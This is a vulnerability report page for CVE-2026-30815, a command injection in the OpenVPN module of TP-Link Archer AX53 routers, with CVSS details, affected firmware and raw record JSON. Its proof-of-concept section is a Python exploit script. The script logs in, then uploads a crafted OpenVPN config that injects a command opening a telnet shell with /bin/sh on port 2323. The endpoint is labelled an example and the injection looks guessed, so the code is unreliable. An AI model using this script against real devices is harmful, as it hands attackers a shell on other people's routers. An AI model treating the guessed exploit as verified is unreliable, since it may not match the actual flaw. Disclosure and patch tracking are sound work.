Security Vulnerability Report
CVE-2026-30815 CVSS 8.0 HIGH

CVE-2026-30815

Published: 2026-04-08 19:25:20
Last Modified: 2026-05-07 16:16:18
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

An OS command injection vulnerability in the OpenVPN module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to execute system commands when a specially crafted configuration file is processed due to insufficient input validation. Successful exploitation may allow modification of configuration files, disclosure of sensitive information, or further compromise of device integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
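CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Note: the raw record below also carries a CVSS 4.0 assessment from the reporting source (base score 8.5, HIGH) that sets privileges required to HIGH, whereas this 3.1 vector sets it to LOW; check both when prioritising.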

Configurations (Affected Products)

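cpe:2.3:o:tp-link:archer_ax53_firmware:*:*:*:*:*:*:*:* - VULNERABLE (firmware versions before 1.7.1)
cpe:2.3:h:tp-link:archer_ax53:1.0:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform; listed because the record combines it with the firmware entry above using AND)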
TP-Link Archer AX53 v1.0 < 1.7.1 Build 20260213

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-30815 # This script demonstrates the OS Command Injection via OpenVPN config upload. import requests # Target URL (Example endpoint structure) target_url = "http://192.168.0.1/cgi-bin/luci/;stok=<token>/admin/vpn/openvpn" # Attacker credentials (Authenticated Low Privileged User) username = "user" password = "user_password" # Login to get session token session = requests.Session() login_payload = {"luci_username": username, "luci_password": password} login_resp = session.post("http://192.168.0.1/cgi-bin/luci", data=login_payload) if login_resp.status_code == 200: print("[+] Login successful") # Malicious OpenVPN configuration file content # The payload injects a command to start a telnet server on port 2323 # This exploits the insufficient input validation in the config parser malicious_config = """ client dev tun proto tcp remote 127.0.0.1 1194 resolv-retry infinite nobind persist-key persist-tun ca ca.crt cert client.crt key client.key # Injection Payload: Using backticks to execute shell command ; `telnetd -l /bin/sh -p 2323` """ files = { 'file_upload': ('exploit.ovpn', malicious_config, 'application/octet-stream') } # Uploading the malicious configuration upload_resp = session.post(target_url, files=files) if upload_resp.status_code == 200: print("[+] Payload uploaded. Check if telnet is running on port 2323.") else: print("[-] Upload failed.") else: print("[-] Login failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30815", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-04-08T19:25:20.320", "lastModified": "2026-05-07T16:16:18.397", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An OS command injection vulnerability in the OpenVPN module\nof TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to execute system commands when a specially crafted configuration file is processed due to insufficient input validation. Successful exploitation may allow modification of configuration files, disclosure of sensitive information, or further compromise of device integrity.\n\nThis issue affects AX53 v1.0: before 1.7.1 Build 20260213."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": 
"NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_ax53_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.1", "matchCriteriaId": "B096B7BB-7693-4C45-B5F7-8FD6E4969DCE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_ax53:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5F3EA1D9-EB47-4785-9CF0-F2B51945917D"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Third Party Advisory"]}, {"url": "https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/faq/5055/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": 
["Vendor Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2303", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2307", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2308", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2309", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}